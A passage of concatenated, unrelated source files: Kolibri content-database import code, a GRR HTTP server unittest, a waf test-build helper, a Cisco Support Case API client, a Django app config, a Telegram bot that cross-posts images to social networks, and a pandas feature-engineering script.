things we can handle for row_mapping in set(schema_map.get("per_row", {}).values()): if hasattr(self, row_mapping): if callable(getattr(self, row_mapping)): return False else: return False # Check that the engine being used is sqlite, and it's been attached can_use_attach = can_use_attach and self._sqlite_db_attached # Check that the table is in the source database (otherwise we can't use the ATTACH method) try: self.source.get_class(model) except ClassNotFoundError: return False return can_use_attach def table_import(self, model, row_mapper, table_mapper, unflushed_rows): # keep track of which model is currently being imported self.current_model_being_imported = model if self.can_use_sqlite_attach_method(model, row_mapper, table_mapper): result = self.raw_attached_sqlite_table_import( model, row_mapper, table_mapper, unflushed_rows ) else: result = self.orm_table_import( model, row_mapper, table_mapper, unflushed_rows ) self.current_model_being_imported = None return result def merge_record(self, data, model, DestinationRecord, do_not_overwrite=False): # Models that should be merged (see list above) need to be individually merged into the session # as SQL Alchemy ORM does not support INSERT ... ON DUPLICATE KEY UPDATE style queries, # as not available in SQLite, only MySQL as far as I can tell: # http://hackthology.com/how-to-compile-mysqls-on-duplicate-key-update-in-sql-alchemy.html RowEntry = self.destination.session.query(DestinationRecord).get( data[model._meta.pk.name] ) if RowEntry: # record already exists, so if we don't want to overwrite, abort here if do_not_overwrite: return for key, value in data.items(): setattr(RowEntry, key, value) else: RowEntry = DestinationRecord(**data) self.destination.session.merge(RowEntry) def check_and_delete_existing_channel(self): try: existing_channel = ChannelMetadata.objects.get(id=self.channel_id) except ChannelMetadata.DoesNotExist: existing_channel = None if existing_channel: if existing_channel.version < self.channel_version: # We have an older version of this channel, so let's clean out the old stuff first logger.info( ( "Older version {channel_version} of channel {channel_id} already exists in database; removing old entries " + "so we can upgrade to version {new_channel_version}" ).format( channel_version=existing_channel.version, channel_id=self.channel_id, new_channel_version=self.channel_version, ) ) self.delete_old_channel_data(existing_channel.root.tree_id) else: # We have previously loaded this channel, with the same or newer version, so our work here is done logger.warn( ( "Version {channel_version} of channel {channel_id} already exists in database; cancelling import of " + "version {new_channel_version}" ).format( channel_version=existing_channel.version, channel_id=self.channel_id, new_channel_version=self.channel_version, ) ) return False return True def _can_use_optimized_pre_deletion(self, model): # check whether we can skip fully deleting this model, if we'll be using REPLACE on it anyway mapping = self.schema_mapping.get(model, {}) row_mapper = self.generate_row_mapper(mapping.get("per_row")) table_mapper = self.generate_table_mapper(mapping.get("per_table")) return self.can_use_sqlite_attach_method(model, row_mapper, table_mapper) def delete_old_channel_data(self, old_tree_id): # construct a template for deleting records for models that foreign key onto ContentNode delete_related_template = """ DELETE FROM {table} WHERE {fk_field} IN ( SELECT id FROM {cn_table} WHERE tree_id = '{tree_id}' ) """ # construct a template for deleting the ContentNode records themselves delete_contentnode_template = "DELETE FROM {table} WHERE tree_id = '{tree_id}'" # we want to delete all content models, but not "merge models" (ones that might also be used by other channels), and ContentNode last models_to_delete = [ model for model in self.content_models if model is not ContentNode and model not in merge_models ] + [ContentNode] for model in models_to_delete: # we do a few things differently if it's the ContentNode model, vs a model related to ContentNode if model is ContentNode: template = delete_contentnode_template fields = ["id"] else: template = delete_related_template fields = [ f.column for f in model._meta.fields if isinstance(f, ForeignKey) and f.target_field.model is ContentNode ] # if the external database is attached and there are no incompatible schema mappings for a table, # we can skip deleting records that will be REPLACED during import, which helps efficiency if self._can_use_optimized_pre_deletion(model): template += " AND NOT id IN (SELECT id FROM sourcedb.{table})" # run a query for each field this model has that foreignkeys onto ContentNode for field in fields: # construct the actual query by filling in variables query = template.format( table=model._meta.db_table, fk_field=field, tree_id=old_tree_id, cn_table=ContentNode._meta.db_table, ) # check that the import operation hasn't since been cancelled self.check_cancelled() # execute the actual query self.destination.session.execute(text(query)) def check_cancelled(self): if callable(self.cancel_check): check = self.cancel_check() else: check = bool(self.cancel_check) if check: raise ImportCancelError("Channel import was cancelled") def try_attaching_sqlite_database(self): # attach the external content database to our primary database so we can directly transfer records en masse if self.destination.engine.name == "sqlite": try: self.destination.session.execute( text( "ATTACH '{path}' AS 'sourcedb'".format(path=self.source_db_path) ) ) self._sqlite_db_attached = True except OperationalError: # silently ignore if we were unable to attach the database; we'll just fall back to other methods pass def try_detaching_sqlite_database(self): # detach the content database from the primary database so we don't get errors trying to attach it again later if self.destination.engine.name == "sqlite": try: self.destination.session.execute( text("DETACH 'sourcedb'".format(path=self.source_db_path)) ) except OperationalError: # silently ignore if the database was already detached, as then we're good to go pass self._sqlite_db_attached = False def import_channel_data(self): unflushed_rows = 0 try: self.try_attaching_sqlite_database() if self.check_and_delete_existing_channel(): for model in self.content_models: mapping = self.schema_mapping.get(model, {}) row_mapper = self.generate_row_mapper(mapping.get("per_row")) table_mapper = self.generate_table_mapper(mapping.get("per_table")) logger.info("Importing {model} data".format(model=model.__name__)) unflushed_rows = self.table_import( model, row_mapper, table_mapper, unflushed_rows ) self.destination.session.commit() self.try_detaching_sqlite_database() except (SQLAlchemyError, ImportCancelError) as e: # Rollback the transaction if any error occurs during the transaction self.destination.session.rollback() self.try_detaching_sqlite_database() # Reraise the exception to prevent other errors occuring due to the non-completion raise e def end(self): self.source.end() self.destination.end() class NoVersionChannelImport(ChannelImport): """ Class defining the schema mapping for importing old content databases (i.e. ones produced before the ChannelImport machinery was implemented). The schema mapping below defines how to bring in information from the old version of the Kolibri content databases into the database for the current version of Kolibri. """ schema_mapping = { # The top level keys of the schema_mapping are the Content Django Models that are to be imported ContentNode: { # For each model's mappings, can defined both 'per_row' and 'per_table' mappings. "per_row": { # The key of the 'per_row' mapping object is the table column that we are populating # In the case of Django ForeignKey fields, this will be the field name plus _id # The value is a string that refers either to a table column on the source data # or a method on this import class that will be passed the row data and should return # the mapped value. "channel_id": "infer_channel_id_from_source", "tree_id": "available_tree_id", "available": "get_none", "license_name": "get_license_name", "license_description": "get_license_description", } }, File: { "per_row": { # If we didn't want to encode the Django _id convention here, we could reference the field # attname in order to set it. File._meta.get_field("local_file").attname: "checksum", "available": "get_none", } }, LocalFile: { # Because LocalFile does not exist on old content databases, we have to override the table that # we are drawing from, the generate_local_file_from_file method overrides the default mapping behaviour # and instead reads from the File model table # It then uses per_row mappers to get the require model fields from the File model to populate our # new LocalFiles. "per_table": "generate_local_file_from_file", "per_row": { "id": "checksum", "extension": "extension", "file_size": "file_size", "available": "get_none", }, }, ChannelMetadata: { "per_row": { ChannelMetadata._meta.get_field( "min_schema_version" ).attname: "set_version_to_no_version", "root_id": "root_pk", } }, } licenses = {} def infer_channel_id_from_source(self, source_object): return self.channel_id def generate_local_file_from_file(self, SourceRecord): SourceRecord = self.source.get_class(File) checksum_record = set() # LocalFile objects are unique per checksum for record in self.source.session.query(SourceRecord).all(): if record.checksum not in checksum_record: checksum_record.add(record.checksum) yield record else: continue def set_version_to_no_version(self, source_object): return NO_VERSION def get_license(self, SourceRecord): license_id = SourceRecord.license_id if not license_id: return None if license_id not in self.licenses: LicenseRecord = self.source.get_class(License) license = self.source.session.query(LicenseRecord).get(license_id) self.licenses[license_id] = license return self.licenses[license_id] def get_license_name(self, SourceRecord): license = self.get_license(SourceRecord) if not license: return None return license.license_name def get_license_description(self, SourceRecord): license = self.get_license(SourceRecord) if not license: return None return license.license_description # Dict that maps from schema versions to ChannelImport classes # The channel import class defines all the operations required in order to import data # from a content database with this content schema, into the schema being used by this # version of Kolibri. When a new schema version is added mappings = { V020BETA1: NoVersionChannelImport, V040BETA3: NoVersionChannelImport, NO_VERSION: NoVersionChannelImport, VERSION_1: ChannelImport, VERSION_2: ChannelImport, } class FutureSchemaError(Exception): pass class InvalidSchemaVersionError(Exception): pass def initialize_import_manager(channel_id, cancel_check=None): channel_metadata = read_channel_metadata_from_db_file( get_content_database_file_path(channel_id) ) # For old versions of content databases, we can only infer the schema version min_version = getattr( channel_metadata, "min_schema_version", getattr(channel_metadata, "inferred_schema_version"), ) try: ImportClass = mappings.get(min_version) except KeyError: try: version_number = int(min_version) if version_number > int(CONTENT_SCHEMA_VERSION): raise FutureSchemaError( "Tried to import schema version, {version}, which is not supported by this version of Kolibri.".format( version=min_version ) ) elif version_number < int(CONTENT_SCHEMA_VERSION): # If it's a valid integer, but there is no schema for it, then we have stopped supporting this version raise InvalidSchemaVersionError( "Tried to import unsupported schema version {version}".format( version=min_version ) ) except ValueError: raise InvalidSchemaVersionError( "Tried to import invalid schema version {version}".format( version=min_version ) ) return ImportClass( channel_id, channel_version=channel_metadata.version, cancel_check=cancel_check ) def import_channel_from_local_db(channel_id, cancel_check=None): import_manager = initialize_import_manager(channel_id, cancel_check=cancel_check) import_manager.import_channel_data() import_manager.end() update_content_metadata(channel_id) channel = ChannelMetadata.objects.get(id=channel_id) channel.last_updated = local_now() try: assert channel.root except ContentNode.DoesNotExist: node_id = channel.root_id ContentNode.objects.create( id=node_id, title=channel.name, content_id=node_id, channel_id=channel_id ) channel.save() #!/usr/bin/env python """Unittest for grr http server.""" import hashlib import os import socket import threading import ipaddr import portpicker import requests from google.protobuf import json_format from grr.lib import flags from grr.lib import utils from grr.lib.rdfvalues import file_finder as rdf_file_finder from grr.lib.rdfvalues import paths as rdf_paths from grr.lib.rdfvalues import rekall_types as rdf_rekall_types from grr.server.grr_response_server import aff4 from grr.server.grr_response_server import flow from grr.server.grr_response_server import frontend_lib from grr.server.grr_response_server.aff4_objects import aff4_grr from grr.server.grr_response_server.aff4_objects import filestore from grr.server.grr_response_server.bin import frontend from grr.server.grr_response_server.flows.general import file_finder from grr.test_lib import action_mocks from grr.test_lib import flow_test_lib from grr.test_lib import rekall_test_lib from grr.test_lib import test_lib from grr.test_lib import worker_mocks class GRRHTTPServerTest(test_lib.GRRBaseTest): """Test the http server.""" @classmethod def setUpClass(cls): super(GRRHTTPServerTest, cls).setUpClass() cls.config_overrider = test_lib.ConfigOverrider({ "Rekall.profile_server": rekall_test_lib.TestRekallRepositoryProfileServer.__name__, "FileUploadFileStore.root_dir": test_lib.TempDirPath() }) cls.config_overrider.Start() # Frontend must be initialized to register all the stats counters. frontend_lib.FrontendInit().RunOnce() # Bring up a local server for testing. port = portpicker.PickUnusedPort() ip = utils.ResolveHostnameToIP("localhost", port) cls.httpd = frontend.GRRHTTPServer((ip, port), frontend.GRRHTTPServerHandler) if ipaddr.IPAddress(ip).version == 6: cls.address_family = socket.AF_INET6 cls.base_url = "http://[%s]:%d/" % (ip, port) else: cls.address_family = socket.AF_INET cls.base_url = "http://%s:%d/" % (ip, port) cls.httpd_thread = threading.Thread(target=cls.httpd.serve_forever) cls.httpd_thread.daemon = True cls.httpd_thread.start() @classmethod def tearDownClass(cls): cls.httpd.shutdown() cls.config_overrider.Stop() def setUp(self): super(GRRHTTPServerTest, self).setUp() self.client_id = self.SetupClient(0) def testServerPem(self): req = requests.get(self.base_url + "server.pem") self.assertEqual(req.status_code, 200) self.assertTrue("BEGIN CERTIFICATE" in req.content) def _RunClientFileFinder(self, paths, action, network_bytes_limit=None, client_id=None): client_id = client_id or self.SetupClient(0) with test_lib.ConfigOverrider({"Client.server_urls": [self.base_url]}): session_id = flow_test_lib.TestFlowHelper( file_finder.ClientFileFinder.__name__, action_mocks.ClientFileFinderClientMock( client_worker=worker_mocks.FakeClientWorker()), client_id=client_id, paths=paths, pathtype=rdf_paths.PathSpec.PathType.OS, action=action, process_non_regular_files=True, network_bytes_limit=network_bytes_limit, token=self.token) return session_id def testClientFileFinderUpload(self): paths = [os.path.join(self.base_path, "{**,.}/*.plist")] action = rdf_file_finder.FileFinderAction.Download() session_id = self._RunClientFileFinder(paths, action) collection = flow.GRRFlow.ResultCollectionForFID(session_id) results = list(collection) self.assertEqual(len(results), 4) relpaths = [ os.path.relpath(p.stat_entry.pathspec.path, self.base_path) for p in results ] self.assertItemsEqual(relpaths, [ "History.plist", "History.xml.plist", "test.plist", "parser_test/com.google.code.grr.plist" ]) for r in results: aff4_obj = aff4.FACTORY.Open( r.stat_entry.pathspec.AFF4Path(self.client_id), token=self.token) data = open(r.stat_entry.pathspec.path, "rb").read() self.assertEqual(aff4_obj.Read(100), data[:100]) hash_obj = aff4_obj.Get(aff4_obj.Schema.HASH) self.assertEqual(hash_obj.md5, hashlib.md5(data).hexdigest()) self.assertEqual(hash_obj.sha1, hashlib.sha1(data).hexdigest()) self.assertEqual(hash_obj.sha256, hashlib.sha256(data).hexdigest()) def testClientFileFinderUploadLimit(self): paths = [os.path.join(self.base_path, "{**,.}/*.plist")] action = rdf_file_finder.FileFinderAction.Download() # TODO(hanuszczak): Instead of catching arbitrary runtime errors, we should # catch specific instance that was thrown. Unfortunately, all errors are # intercepted in the `MockWorker` class and converted to runtime errors. with self.assertRaisesRegexp(RuntimeError, "exceeded network send limit"): self._RunClientFileFinder(paths, action, network_bytes_limit=1500) def testClientFileFinderUploadBound(self): paths = [os.path.join(self.base_path, "{**,.}/*.plist")] action = rdf_file_finder.FileFinderAction.Download( oversized_file_policy="DOWNLOAD_TRUNCATED", max_size=300) session_id = self._RunClientFileFinder(paths, action) collection = flow.GRRFlow.ResultCollectionForFID(session_id) results = list(collection) self.assertEqual(len(results), 4) relpaths = [ os.path.relpath(p.stat_entry.pathspec.path, self.base_path) for p in results ] self.assertItemsEqual(relpaths, [ "History.plist", "History.xml.plist", "test.plist", "parser_test/com.google.code.grr.plist" ]) for r in results: aff4_obj = aff4.FACTORY.Open( r.stat_entry.pathspec.AFF4Path(self.client_id), token=self.token) data = aff4_obj.read() self.assertLessEqual(len(data), 300) self.assertEqual(data, open(r.stat_entry.pathspec.path, "rb").read(len(data))) def testClientFileFinderUploadSkip(self): paths = [os.path.join(self.base_path, "{**,.}/*.plist")] action = rdf_file_finder.FileFinderAction.Download( oversized_file_policy="SKIP", max_size=300) session_id = self._RunClientFileFinder(paths, action) collection = flow.GRRFlow.ResultCollectionForFID(session_id) results = list(collection) skipped = [] uploaded = [] for result in results: if result.HasField("transferred_file"): uploaded.append(result) else: skipped.append(result) self.assertEqual(len(uploaded), 2) self.assertEqual(len(skipped), 2) relpaths = [ os.path.relpath(p.stat_entry.pathspec.path, self.base_path) for p in uploaded ] self.assertItemsEqual(relpaths, ["History.plist", "test.plist"]) for r in uploaded: aff4_obj = aff4.FACTORY.Open( r.stat_entry.pathspec.AFF4Path(self.client_id), token=self.token) self.assertEqual( aff4_obj.Read(100), open(r.stat_entry.pathspec.path, "rb").read(100)) def testClientFileFinderFilestoreIntegration(self): paths = [os.path.join(self.base_path, "{**,.}/*.plist")] action = rdf_file_finder.FileFinderAction.Download() client_ids = self.SetupClients(2) session_ids = { c: self._RunClientFileFinder(paths, action, client_id=c) for c in client_ids } collections = { c: flow.GRRFlow.ResultCollectionForFID(session_id) for c, session_id in session_ids.iteritems() } for client_id, collection in collections.iteritems(): results = list(collection) self.assertEqual(len(results), 4) relpaths = [ os.path.relpath(p.stat_entry.pathspec.path, self.base_path) for p in results ] self.assertItemsEqual(relpaths, [ "History.plist", "History.xml.plist", "test.plist", "parser_test/com.google.code.grr.plist" ]) for r in results: aff4_obj = aff4.FACTORY.Open( r.stat_entry.pathspec.AFF4Path(client_id), token=self.token) # When files are uploaded to the server they are stored as VFSBlobImage. self.assertIsInstance(aff4_obj, aff4_grr.VFSBlobImage) # There is a STAT entry. self.assertTrue(aff4_obj.Get(aff4_obj.Schema.STAT)) # Make sure the HashFileStore has references to this file for # all hashes. hashes = aff4_obj.Get(aff4_obj.Schema.HASH) fs = filestore.HashFileStore md5_refs = list(fs.GetReferencesMD5(hashes.md5, token=self.token)) self.assertIn(aff4_obj.urn, md5_refs) sha1_refs = list(fs.GetReferencesSHA1(hashes.sha1, token=self.token)) self.assertIn(aff4_obj.urn, sha1_refs) sha256_refs = list( fs.GetReferencesSHA256(hashes.sha256, token=self.token)) self.assertIn(aff4_obj.urn, sha256_refs) # Open the file inside the file store. urn, _ = fs(None, token=self.token).CheckHashes(hashes).next() filestore_fd = aff4.FACTORY.Open(urn, token=self.token) # This is a VFSBlobImage too. self.assertIsInstance(filestore_fd, aff4_grr.VFSBlobImage) # No STAT object attached. self.assertFalse(filestore_fd.Get(filestore_fd.Schema.STAT)) def testRekallProfiles(self): req = requests.get(self.base_url + "rekall_profiles") self.assertEqual(req.status_code, 500) req = requests.get(self.base_url + "rekall_profiles/v1.0") self.assertEqual(req.status_code, 500) known_profile = "F8E2A8B5C9B74BF4A6E4A48F180099942" unknown_profile = "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" req = requests.get(self.base_url + "rekall_profiles/v1.0/nt/GUID/" + unknown_profile) self.assertEqual(req.status_code, 404) req = requests.get(self.base_url + "rekall_profiles/v1.0/nt/GUID/" + known_profile) self.assertEqual(req.status_code, 200) pb = rdf_rekall_types.RekallProfile.protobuf() json_format.Parse(req.content.lstrip(")]}'\n"), pb) profile = rdf_rekall_types.RekallProfile.FromSerializedString( pb.SerializeToString()) self.assertEqual(profile.name, "nt/GUID/F8E2A8B5C9B74BF4A6E4A48F180099942") self.assertEqual(profile.version, "v1.0") self.assertEqual(profile.data[:2], "\x1f\x8b") def main(args): test_lib.main(args) if __name__ == "__main__": flags.StartMain(main) <reponame>Vladec/matching-engine import os import glob import subprocess """ """ def get_top_level(bld): ''' Get the relative path from the caller wscript to main wscript. ''' import traceback, os stack = traceback.extract_stack(limit=2) caller = os.path.dirname(stack[0][0]) root = bld.srcnode.abspath() root_to_caller = caller[len(root):].strip(os.path.sep) caller_to_root = '' for entry in root_to_caller.split(os.path.sep): caller_to_root += '..' + os.path.sep caller_to_root = caller_to_root.rstrip(os.path.sep) return caller_to_root def get_module_include_dirs(Context,ModuleName): search_path = "%s%sinclude"%(ModuleName,os.sep) top_level = get_top_level(Context) list = [ os.path.join(search_path,f) for f in os.listdir(search_path) if os.path.isdir(os.path.join(search_path,f))] list.append(search_path) list = [ os.path.join(top_level,f) for f in list] return list """ Unittest related stuff Contain functions to build and run unit tests """ def build_tests(Context, deps, include_paths): saved_dir = os.getcwd() os.chdir( Context.path.relpath() ) source_files = glob.glob("tests/src/*.cpp") for src in source_files: target = "bin"+os.sep+ os.path.basename( os.path.splitext(src)[0] ) res = Context.program ( source=src, target= target, use=deps, includes=include_paths ) for File in glob.glob("tests/config/*.ini"): Context(rule='cp ${SRC} ${TGT}', source=File, target='bin/%s'%os.path.basename(File) ) Context(rule='cp ${SRC} ${TGT}', source="tests/config/pom.xml", target='pom.xml' ) os.chdir( saved_dir ) def run_tests(Context): bin_dir = Context.out_dir + os.sep + Context.path.relpath() + os.sep + 'bin' if not os.path.isdir(bin_dir): # Directory doesn't exist. return saved_dir = os.getcwd() os.chdir( bin_dir ) unit_tests = glob.glob("test_*") for test in unit_tests: JUNIT_RESULT = "xunit-%s-report.xml"% (test) VALGRIND_RESULT = "valgrind-%s-report.xml"% (test) Cmd = ["valgrind", "--xml=yes", '--xml-file=%s'%VALGRIND_RESULT, './%s'% test, '--gtest_output=xml:%s' %JUNIT_RESULT ] subprocess.Popen(Cmd).communicate() os.chdir( saved_dir ) <filename>src/ciscosupportsdk/api/case.py from typing import Iterable from ciscosupportsdk.apisession import ApiSession from ciscosupportsdk.models.case import ( Case, CaseDetail, CaseDetailResponse, CaseResponse, CaseStatusFlag, CaseSummaryResponse, SortCaseBy, ) from ciscosupportsdk.validate import CheckSize SERVICE_BASE_URL = "/case/v3/cases" class CaseApi(object): """ The Cisco Support Case API v3 provides a powerful, convenient, and simple way to interact with the Cisco Support Case Manager tool and aims to improve the partner and customer experience by enabling you to access case information instantly, programmatically, and in bulk. """ def __init__(self, session: ApiSession) -> None: self._session = session @CheckSize("case_ids", 30) def get_case_summary( self, case_ids: list[str], sort_by: SortCaseBy = SortCaseBy.UPDATED_DATE, ) -> Iterable[Case]: """ Returns brief information for the specified case or cases. :param: case_ids: list[str]: Identifier of the case or cases for which to return results. Multiple values must be specified within a comma-separated list and cannot exceed 30 IDs. :param: sort_by: SortCaseBy: Order in which the results should be sorted. """ path = f"{SERVICE_BASE_URL}/case_ids/" f"{','.join(case_ids)}" params = {"sort_by": sort_by} yield from self._session.enumerate_results( CaseSummaryResponse, path, query_params=params ) def get_case_details(self, case_id: str) -> CaseDetail: """ Returns detailed information for the specified case. :param: case_id: str: Identifier of the case for which to return results. """ path = f"{SERVICE_BASE_URL}/details/case_id/{case_id}" return self._session.get_result(CaseDetailResponse, path) @CheckSize("contract_ids", 10) def get_cases_by_contract_id( self, contract_ids: list[str], date_created_from: str = None, date_created_to: str = None, status_flag: CaseStatusFlag = CaseStatusFlag.OPEN, ) -> Iterable[Case]: """ Returns summary information for cases associated with the specified contract or contracts. :param: contract_ids: list[str]: Identifier of the user or users for which to return results. A maximum of 10 may be passed. :param: date_created_from: str: Beginning date (in UTC) of the range in which to search. For example: 2013-04-23T11:00:14Z Note: The maximum date range currently supported is 90 days. :param: date_created_to: str: End date (in UTC) of the range in which to search. For example: 2013-04-23T11:00:14Z Note: The maximum date range currently supported is 90 days. :param: status_flag: CaseStatusFlag: Return only cases associated with the specified status. """ path = ( f"{SERVICE_BASE_URL}/contracts/contract_ids/" f"{','.join(contract_ids)}" ) params = { "date_created_from": date_created_from, "date_created_to": date_created_to, "status_flag": status_flag, } yield from self._session.enumerate_results( CaseResponse, path, query_params=params ) @CheckSize("user_ids", 10) def get_cases_by_user_id( self, user_ids: list[str], date_created_from: str = None, date_created_to: str = None, status_flag: CaseStatusFlag = CaseStatusFlag.OPEN, ) -> Iterable[Case]: """ Returns summary information for cases associated with the specified contract or contracts. :param: user_ids: list[str]: Identifier of the user or users for which to return results. A maximum of 10 may be passed. :param: date_created_from: str: Beginning date (in UTC) of the range in which to search. For example: 2013-04-23T11:00:14Z Note: The maximum date range currently supported is 90 days. :param: date_created_to: str: End date (in UTC) of the range in which to search. For example: 2013-04-23T11:00:14Z Note: The maximum date range currently supported is 90 days. :param: status_flag: CaseStatusFlag: Return only cases associated with the specified status. """ path = f"{SERVICE_BASE_URL}/users/user_ids/" f"{','.join(user_ids)}" params = { "date_created_from": date_created_from, "date_created_to": date_created_to, "status_flag": status_flag, } yield from self._session.enumerate_results( CaseResponse, path, query_params=params ) from django.apps import AppConfig import session_csrf class BaseAppConfig(AppConfig): name = '{{ cookiecutter.project_name }}.base' def ready(self): # The app is now ready. Include any monkey patches here. # Monkey patch CSRF to switch to session based CSRF. Session # based CSRF will prevent attacks from apps under the same # domain. If you're planning to host your app under it's own # domain you can remove session_csrf and use Django's CSRF # library. See also # https://github.com/mozilla/sugardough/issues/38 session_csrf.monkeypatch() <reponame>vinaynpp/onepostbot<filename>onepostbot.py import logging from telegram import Update from telegram.ext import Updater, CommandHandler, MessageHandler, Filters, CallbackContext import facebook import tweepy import json import requests # OPENING CREDENTIALS FILE FOR THE DATA REQUIRED with open('credentials.json', 'r') as cd: cdjson = json.load(cd) # Enable logging logging.basicConfig( format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO ) logger = logging.getLogger(__name__) bstatus = 1 def fb(image, caption): # INITIALIZING PAGE ACCESS TOKEN graph = facebook.GraphAPI(cdjson["facebook_page_access_token"]) bstatus = 2 # PUBLISHING THE IMAGE WITH CAPTION ON TO THE FACEBOOK PAGE graph.put_photo(image=open(image, "rb").read(), caption=caption) bstatus = 3 return bstatus def insta(image, caption): # INITIALIZING IMAGE AND CAPTION OBJECT TO THE FACEBOOK SERVER initurl = "https://graph.facebook.com/" + cdjson[ "instagram_business_id"] + "/media?image_url=" + image + "&caption=" + caption + "&access_token=" + \ cdjson[ "facebook_page_access_token"] creation = requests.request(method="post", url=initurl) creation_id = "" + creation.json()["id"] bstatus = 2 # PUBLISHING THE OBJECT CREATED ON THE FACEBOOK SERVER finalurl = "https://graph.facebook.com/" + cdjson["instagram_business_id"] + "/media_publish?creation_id=" + \ creation_id + "&access_token=" + cdjson[ "facebook_page_access_token"] creation = requests.request(method="post", url=finalurl) bstatus = 3 return bstatus def tweewt(image, caption): auth = tweepy.OAuthHandler(cdjson["twitter_consumer_key"], cdjson["twitter_consumer_secret"]) auth.set_access_token(cdjson["twitter_access_token"], cdjson["twitter_access_token_secret"]) api = tweepy.API(auth) # INITIALIZING THE IMAGE ON THE SERVER media = api.media_upload(image) bstatus = 2 # PUBLISHING THE CHANGES ON THE FINAL SERVER post_result = api.update_status(status=caption, media_ids=[media.media_id]) bstatus = 3 return bstatus def botcon(image, caption): urlgenerator = 'http://vyd2999.pythonanywhere.com/' with open(image, 'rb') as f: r = requests.post(urlgenerator, files={'image': f}) imageurl = r.json()["url"] fb(image=image, caption=caption) mbstatus = 2 insta(image=imageurl, caption=caption) mbstatus = 3 tweewt(image=image, caption=caption) mbstatus = 5 return mbstatus def start(update: Update, context: CallbackContext) -> None: """Send a message when the command /start is issued.""" update.message.reply_text( 'Hi! KEEP SENDING MEMES BUT MAKE SURE YOU HAVE THE RIGHT TO SHARE AND IF WE HSHARE ON ' 'OUR SOCIAL HANDLE WE ARE NOT RESPONSIBLE FOR ANY COPYRIGHT INFRINGEMENTS... ' 'SO ONLY SHARE MEMES YOU OWN AND DO NOT MIND US POSTING THEN KEEP SENDING') def help_command(update: Update, context: CallbackContext) -> None: """Send a message when the command /help is issued.""" update.message.reply_text('Help!') def echotext(update: Update, context: CallbackContext) -> None: """Echo the user message.""" update.message.reply_text("Sirf caption leke kya karu me pic bhejna yaar") def echonikal(update: Update, context: CallbackContext) -> None: """Echo the user message.""" update.message.reply_text("jisne ye bot banaya vohi meme bhejega tu pehli fursat me nikal") def echoimage(update: Update, context: CallbackContext) -> None: """Echo the user message.""" update.message.reply_text("Abey bina caption ke post kardu isko me?") def photo(update: Update, context: CallbackContext): user = update.message.from_user photo_file = update.message.photo[-1].get_file() caption_text = update.message.caption filename = "temp/" + str(photo_file.file_id) + ".jpg" photo_file.download(filename) botcon(image=filename, caption=caption_text) update.message.reply_text('NOICE MEME KEEP SENDING...') print(user.username + " sent " + photo_file.file_id) def andar(): """Start the bot.""" print("telegram bot working") # Create the Updater and pass it your bot's token. updater = Updater(cdjson["telegram_token"]) # Get the dispatcher to register handlers dispatcher = updater.dispatcher # on different commands - answer in Telegram dispatcher.add_handler(CommandHandler("start", start)) dispatcher.add_handler(CommandHandler("help", help_command)) # on noncommand i.e message - echo the message on Telegram dispatcher.add_handler( MessageHandler((Filters.chat(username=cdjson["telegram_username"])) & Filters.text & ~Filters.command, echotext)) dispatcher.add_handler(MessageHandler( Filters.chat(username=cdjson["telegram_username"]) & Filters.photo & Filters.caption & ~Filters.command, photo)) dispatcher.add_handler( MessageHandler(Filters.chat(username=cdjson["telegram_username"]) & Filters.photo & ~Filters.command, echoimage)) dispatcher.add_handler( MessageHandler((Filters.chat(username=cdjson["telegram_username1"])) & Filters.text & ~Filters.command, echotext)) dispatcher.add_handler(MessageHandler( Filters.chat(username=cdjson["telegram_username1"]) & Filters.photo & Filters.caption & ~Filters.command, photo)) dispatcher.add_handler( MessageHandler(Filters.chat(username=cdjson["telegram_username1"]) & Filters.photo & ~Filters.command, echoimage)) dispatcher.add_handler( MessageHandler((Filters.chat(username=cdjson["telegram_username2"])) & Filters.text & ~Filters.command, echotext)) dispatcher.add_handler(MessageHandler( Filters.chat(username=cdjson["telegram_username2"]) & Filters.photo & Filters.caption & ~Filters.command, photo)) dispatcher.add_handler( MessageHandler(Filters.chat(username=cdjson["telegram_username2"]) & Filters.photo & ~Filters.command, echoimage)) dispatcher.add_handler( MessageHandler((Filters.chat(username=cdjson["telegram_username3"])) & Filters.text & ~Filters.command, echotext)) dispatcher.add_handler(MessageHandler( Filters.chat(username=cdjson["telegram_username3"]) & Filters.photo & Filters.caption & ~Filters.command, photo)) dispatcher.add_handler( MessageHandler(Filters.chat(username=cdjson["telegram_username3"]) & Filters.photo & ~Filters.command, echoimage)) dispatcher.add_handler(MessageHandler(~Filters.command, echonikal)) # Start the Bot updater.start_polling() # Run the bot until you press Ctrl-C or the process receives SIGINT, # SIGTERM or SIGABRT. This should be used most of the time, since # start_polling() is non-blocking and will stop the bot gracefully. updater.idle() if __name__ == '__main__': andar() botcon(image="https://drive.google.com/thumbnail?id=1PMrBo42GXpToOfdkrbTVgIz9MyqRGOiA", caption="hello world") #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Tue Jul 10 10:57:48 2018 @author: Kazuki 支払う間隔 """ import numpy as np import pandas as pd import gc import os from multiprocessing import Pool #NTHREAD = cpu_count() #import utils_agg import utils utils.start(__file__) #============================================================================== PREF = 'f306_' KEY = 'SK_ID_PREV' day_start = -365*10 # min: -2922 day_end = -365*0 # min: -2922 os.system(f'rm ../feature_prev/t*_{PREF}*') # ============================================================================= # # ============================================================================= train = utils.read_pickles('../data/prev_train', [KEY]) test = utils.read_pickles('../data/prev_test', [KEY]) prev = utils.read_pickles('../data/previous_application', ['SK_ID_PREV', 'NAME_CONTRACT_TYPE']) # ============================================================================= # # ============================================================================= def percentile(n): def percentile_(x): return np.percentile(x, n) percentile_.__name__ = 'percentile_%s' % n return percentile_ def aggregate(args): path, cont_type, pref = args df = utils.read_pickles(path, [KEY, 'DAYS_ENTRY_PAYMENT']) df = df[df['DAYS_ENTRY_PAYMENT'].between(day_start, day_end)].sort_values([KEY, 'DAYS_ENTRY_PAYMENT']) df = pd.merge(df, prev, on=KEY, how='left'); gc.collect() if cont_type=='NA': df = df[df['NAME_CONTRACT_TYPE'].isnull()] else: df = df[df['NAME_CONTRACT_TYPE']==cont_type] df['DEP_diff'] = df.groupby(KEY).DAYS_ENTRY_PAYMENT.diff() feature = df.groupby(KEY).agg({'DEP_diff': ['min', 'mean', 'max', 'var', 'nunique']}) feature.columns = pd.Index([e[0] + "_" + e[1] for e in feature.columns.tolist()]) feature.reset_index(inplace=True) utils.remove_feature(feature, var_limit=0, sample_size=19999) tmp = pd.merge(train, feature, on=KEY, how='left').drop(KEY, axis=1) utils.to_feature(tmp.add_prefix(PREF+pref), '../feature_prev/train') tmp = 